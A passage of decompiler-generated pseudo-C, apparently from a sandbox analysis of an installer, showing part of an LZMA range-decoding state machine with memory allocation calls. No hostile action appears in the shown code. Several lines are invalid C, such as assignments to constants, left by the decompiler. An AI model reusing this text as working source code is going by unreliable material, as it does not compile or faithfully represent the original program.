                                                                                  				signed int _t530;
                                                                                  				void _t537;
                                                                                  				signed int _t538;
                                                                                  				signed int _t539;
                                                                                  				unsigned short _t569;
                                                                                  				signed int _t579;
                                                                                  				signed int _t607;
                                                                                  				void* _t627;
                                                                                  				signed int _t628;
                                                                                  				signed int _t635;
                                                                                  				signed int* _t643;
                                                                                  				void* _t644;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					_t530 =  *(_t644 - 0x30);
                                                                                  					if(_t530 >= 4) {
                                                                                  					}
                                                                                  					 *(_t644 - 0x40) = 6;
                                                                                  					 *(_t644 - 0x7c) = 0x19;
                                                                                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                  					while(1) {
                                                                                  						L145:
                                                                                  						 *(_t644 - 0x50) = 1;
                                                                                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                  						while(1) {
                                                                                  							L149:
                                                                                  							if( *(_t644 - 0x48) <= 0) {
                                                                                  								goto L155;
                                                                                  							}
                                                                                  							L150:
                                                                                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                  							 *(_t644 - 0x54) = _t643;
                                                                                  							_t569 =  *_t643;
                                                                                  							_t635 = _t569 & 0x0000ffff;
                                                                                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                  							if( *(_t644 - 0xc) >= _t607) {
                                                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                  								_t628 = _t627 + 1;
                                                                                  								 *_t643 = _t569 - (_t569 >> 5);
                                                                                  								 *(_t644 - 0x50) = _t628;
                                                                                  							} else {
                                                                                  								 *(_t644 - 0x10) = _t607;
                                                                                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                  							}
                                                                                  							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                  								L148:
                                                                                  								_t487 = _t644 - 0x48;
                                                                                  								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                  								L149:
                                                                                  								if( *(_t644 - 0x48) <= 0) {
                                                                                  									goto L155;
                                                                                  								}
                                                                                  								goto L150;
                                                                                  							} else {
                                                                                  								L154:
                                                                                  								L146:
                                                                                  								if( *(_t644 - 0x6c) == 0) {
                                                                                  									L169:
                                                                                  									 *(_t644 - 0x88) = 0x18;
                                                                                  									L170:
                                                                                  									_t579 = 0x22;
                                                                                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                  									_t539 = 0;
                                                                                  									L172:
                                                                                  									return _t539;
                                                                                  								}
                                                                                  								L147:
                                                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                  								_t484 = _t644 - 0x70;
                                                                                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                  								goto L148;
                                                                                  							}
                                                                                  							L155:
                                                                                  							_t537 =  *(_t644 - 0x7c);
                                                                                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                  							while(1) {
                                                                                  								L140:
                                                                                  								 *(_t644 - 0x88) = _t537;
                                                                                  								while(1) {
                                                                                  									L1:
                                                                                  									_t538 =  *(_t644 - 0x88);
                                                                                  									if(_t538 > 0x1c) {
                                                                                  										break;
                                                                                  									}
                                                                                  									L2:
                                                                                  									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                                  										case 0:
                                                                                  											L3:
                                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L4:
                                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                  											_t538 =  *( *(_t644 - 0x70));
                                                                                  											if(_t538 > 0xe1) {
                                                                                  												goto L171;
                                                                                  											}
                                                                                  											L5:
                                                                                  											_t542 = _t538 & 0x000000ff;
                                                                                  											_push(0x2d);
                                                                                  											asm("cdq");
                                                                                  											_pop(_t581);
                                                                                  											_push(9);
                                                                                  											_pop(_t582);
                                                                                  											_t638 = _t542 / _t581;
                                                                                  											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                  											asm("cdq");
                                                                                  											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                  											 *(_t644 - 0x3c) = _t633;
                                                                                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                  												L10:
                                                                                  												if(_t641 == 0) {
                                                                                  													L12:
                                                                                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                  													goto L15;
                                                                                  												} else {
                                                                                  													goto L11;
                                                                                  												}
                                                                                  												do {
                                                                                  													L11:
                                                                                  													_t641 = _t641 - 1;
                                                                                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                  												} while (_t641 != 0);
                                                                                  												goto L12;
                                                                                  											}
                                                                                  											L6:
                                                                                  											if( *(_t644 - 4) != 0) {
                                                                                  												GlobalFree( *(_t644 - 4));
                                                                                  											}
                                                                                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  											 *(_t644 - 4) = _t538;
                                                                                  											if(_t538 == 0) {
                                                                                  												goto L171;
                                                                                  											} else {
                                                                                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                  												goto L10;
                                                                                  											}
                                                                                  										case 1:
                                                                                  											L13:
                                                                                  											__eflags =  *(_t644 - 0x6c);
                                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                                  												L157:
                                                                                  												 *(_t644 - 0x88) = 1;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L14:
                                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                  											_t45 = _t644 - 0x48;
                                                                                  											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                  											__eflags =  *_t45;
                                                                                  											L15:
                                                                                  											if( *(_t644 - 0x48) < 4) {
                                                                                  												goto L13;
                                                                                  											}
                                                                                  											L16:
                                                                                  											_t550 =  *(_t644 - 0x40);
                                                                                  											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                  												L20:
                                                                                  												 *(_t644 - 0x48) = 5;
                                                                                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                  												goto L23;
                                                                                  											}
                                                                                  											L17:
                                                                                  											 *(_t644 - 0x74) = _t550;
                                                                                  											if( *(_t644 - 8) != 0) {
                                                                                  												GlobalFree( *(_t644 - 8));
                                                                                  											}
                                                                                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                  											 *(_t644 - 8) = _t538;
                                                                                  											if(_t538 == 0) {
                                                                                  												goto L171;
                                                                                  											} else {
                                                                                  												goto L20;
                                                                                  											}
                                                                                  										case 2:
                                                                                  											L24:
                                                                                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                  											 *(_t644 - 0x84) = 6;
                                                                                  											 *(_t644 - 0x4c) = _t557;
                                                                                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                  											goto L132;
                                                                                  										case 3:
                                                                                  											L21:
                                                                                  											__eflags =  *(_t644 - 0x6c);
                                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                                  												L158:
                                                                                  												 *(_t644 - 0x88) = 3;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L22:
                                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                  											_t67 = _t644 - 0x70;
                                                                                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                  											__eflags =  *_t67;
                                                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                  											L23:
                                                                                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                  											if( *(_t644 - 0x48) != 0) {
                                                                                  												goto L21;
                                                                                  											}
                                                                                  											goto L24;
                                                                                  										case 4:
                                                                                  											L133:
                                                                                  											_t559 =  *_t642;
                                                                                  											_t626 = _t559 & 0x0000ffff;
                                                                                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                  											if( *(_t644 - 0xc) >= _t596) {
                                                                                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                  												 *(_t644 - 0x40) = 1;
                                                                                  												_t560 = _t559 - (_t559 >> 5);
                                                                                  												__eflags = _t560;
                                                                                  												 *_t642 = _t560;
                                                                                  											} else {
                                                                                  												 *(_t644 - 0x10) = _t596;
                                                                                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                  											}
                                                                                  											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                  												goto L139;
                                                                                  											} else {
                                                                                  												goto L137;
                                                                                  											}
                                                                                  										case 5:
                                                                                  											L137:
                                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                                  												L168:
                                                                                  												 *(_t644 - 0x88) = 5;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L138:
                                                                                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                  											L139:
                                                                                  											_t537 =  *(_t644 - 0x84);
                                                                                  											L140:
                                                                                  											 *(_t644 - 0x88) = _t537;
                                                                                  											goto L1;
                                                                                  										case 6:
                                                                                  											L25:
                                                                                  											__edx = 0;
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												L36:
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x34) = 1;
                                                                                  												 *(__ebp - 0x84) = 7;
                                                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                  												goto L132;
                                                                                  											}
                                                                                  											L26:
                                                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  											__esi =  *(__ebp - 0x60);
                                                                                  											__cl = 8;
                                                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  											__ecx =  *(__ebp - 0x3c);
                                                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  											__ecx =  *(__ebp - 4);
                                                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  											if( *(__ebp - 0x38) >= 4) {
                                                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                                                  													_t98 = __ebp - 0x38;
                                                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                  													__eflags =  *_t98;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  												}
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x38) = 0;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                  											if( *(__ebp - 0x34) == __edx) {
                                                                                  												L35:
                                                                                  												__ebx = 0;
                                                                                  												__ebx = 1;
                                                                                  												goto L61;
                                                                                  											} else {
                                                                                  												L32:
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 8);
                                                                                  												__ebx = 0;
                                                                                  												__ebx = 1;
                                                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  												goto L41;
                                                                                  											}
                                                                                  										case 7:
                                                                                  											L66:
                                                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                                                  											if( *(__ebp - 0x40) != 1) {
                                                                                  												L68:
                                                                                  												__eax =  *(__ebp - 0x24);
                                                                                  												 *(__ebp - 0x80) = 0x16;
                                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  												__eax =  *(__ebp - 0x28);
                                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  												__al = __al & 0x000000fd;
                                                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                                                  												__eflags = __eax;
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												goto L69;
                                                                                  											}
                                                                                  											L67:
                                                                                  											__eax =  *(__ebp - 4);
                                                                                  											__ecx =  *(__ebp - 0x38);
                                                                                  											 *(__ebp - 0x84) = 8;
                                                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                  											goto L132;
                                                                                  										case 8:
                                                                                  											L70:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x84) = 0xa;
                                                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x38);
                                                                                  												__ecx =  *(__ebp - 4);
                                                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                  												 *(__ebp - 0x84) = 9;
                                                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                  											}
                                                                                  											goto L132;
                                                                                  										case 9:
                                                                                  											L73:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												goto L90;
                                                                                  											}
                                                                                  											L74:
                                                                                  											__eflags =  *(__ebp - 0x60);
                                                                                  											if( *(__ebp - 0x60) == 0) {
                                                                                  												goto L171;
                                                                                  											}
                                                                                  											L75:
                                                                                  											__eax = 0;
                                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  											__eflags = _t259;
                                                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                  											goto L76;
                                                                                  										case 0xa:
                                                                                  											L82:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												L84:
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x84) = 0xb;
                                                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                  												goto L132;
                                                                                  											}
                                                                                  											L83:
                                                                                  											__eax =  *(__ebp - 0x28);
                                                                                  											goto L89;
                                                                                  										case 0xb:
                                                                                  											L85:
                                                                                  											__eflags =  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                                  												__ecx =  *(__ebp - 0x24);
                                                                                  												__eax =  *(__ebp - 0x20);
                                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  											} else {
                                                                                  												__eax =  *(__ebp - 0x24);
                                                                                  											}
                                                                                  											__ecx =  *(__ebp - 0x28);
                                                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  											L89:
                                                                                  											__ecx =  *(__ebp - 0x2c);
                                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  											L90:
                                                                                  											__eax =  *(__ebp - 4);
                                                                                  											 *(__ebp - 0x80) = 0x15;
                                                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                  											goto L69;
                                                                                  										case 0xc:
                                                                                  											L99:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												L164:
                                                                                  												 *(__ebp - 0x88) = 0xc;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L100:
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t334 = __ebp - 0x70;
                                                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t334;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											__eax =  *(__ebp - 0x2c);
                                                                                  											goto L101;
                                                                                  										case 0xd:
                                                                                  											L37:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												L159:
                                                                                  												 *(__ebp - 0x88) = 0xd;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L38:
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t122 = __ebp - 0x70;
                                                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t122;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L39:
                                                                                  											__eax =  *(__ebp - 0x40);
                                                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  												goto L48;
                                                                                  											}
                                                                                  											L40:
                                                                                  											__eflags = __ebx - 0x100;
                                                                                  											if(__ebx >= 0x100) {
                                                                                  												goto L54;
                                                                                  											}
                                                                                  											L41:
                                                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  											__ecx =  *(__ebp - 0x58);
                                                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  											 *(__ebp - 0x48) = __eax;
                                                                                  											__eax = __eax + 1;
                                                                                  											__eax = __eax << 8;
                                                                                  											__eax = __eax + __ebx;
                                                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  											__ax =  *__esi;
                                                                                  											 *(__ebp - 0x54) = __esi;
                                                                                  											__edx = __ax & 0x0000ffff;
                                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  												__cx = __ax;
                                                                                  												 *(__ebp - 0x40) = 1;
                                                                                  												__cx = __ax >> 5;
                                                                                  												__eflags = __eax;
                                                                                  												__ebx = __ebx + __ebx + 1;
                                                                                  												 *__esi = __ax;
                                                                                  											} else {
                                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                                  												0x800 = 0x800 - __edx;
                                                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  												__ebx = __ebx + __ebx;
                                                                                  												 *__esi = __cx;
                                                                                  											}
                                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  												goto L39;
                                                                                  											} else {
                                                                                  												L45:
                                                                                  												goto L37;
                                                                                  											}
                                                                                  										case 0xe:
                                                                                  											L46:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												L160:
                                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L47:
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t156 = __ebp - 0x70;
                                                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t156;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											while(1) {
                                                                                  												L48:
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													break;
                                                                                  												}
                                                                                  												L49:
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__edx = __ebx + __ebx;
                                                                                  												__ecx =  *(__ebp - 0x10);
                                                                                  												__esi = __edx + __eax;
                                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													_t170 = __edx + 1; // 0x1
                                                                                  													__ebx = _t170;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													continue;
                                                                                  												} else {
                                                                                  													L53:
                                                                                  													goto L46;
                                                                                  												}
                                                                                  											}
                                                                                  											L54:
                                                                                  											_t173 = __ebp - 0x34;
                                                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  											__eflags =  *_t173;
                                                                                  											goto L55;
                                                                                  										case 0xf:
                                                                                  											L58:
                                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                                  												L161:
                                                                                  												 *(__ebp - 0x88) = 0xf;
                                                                                  												goto L170;
                                                                                  											}
                                                                                  											L59:
                                                                                  											__ecx =  *(__ebp - 0x70);
                                                                                  											__eax =  *(__ebp - 0xc);
                                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											_t203 = __ebp - 0x70;
                                                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                  											__eflags =  *_t203;
                                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  											L60:
                                                                                  											__eflags = __ebx - 0x100;
                                                                                  											if(__ebx >= 0x100) {
                                                                                  												L55:
                                                                                  												__al =  *(__ebp - 0x44);
                                                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  												goto L56;
                                                                                  											}
                                                                                  											L61:
                                                                                  											__eax =  *(__ebp - 0x58);
                                                                                  											__edx = __ebx + __ebx;
                                                                                  											__ecx =  *(__ebp - 0x10);
                                                                                  											__esi = __edx + __eax;
                                                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  											__ax =  *__esi;
                                                                                  											 *(__ebp - 0x54) = __esi;
                                                                                  											__edi = __ax & 0x0000ffff;
                                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  												__cx = __ax;
                                                                                  												_t217 = __edx + 1; // 0x1
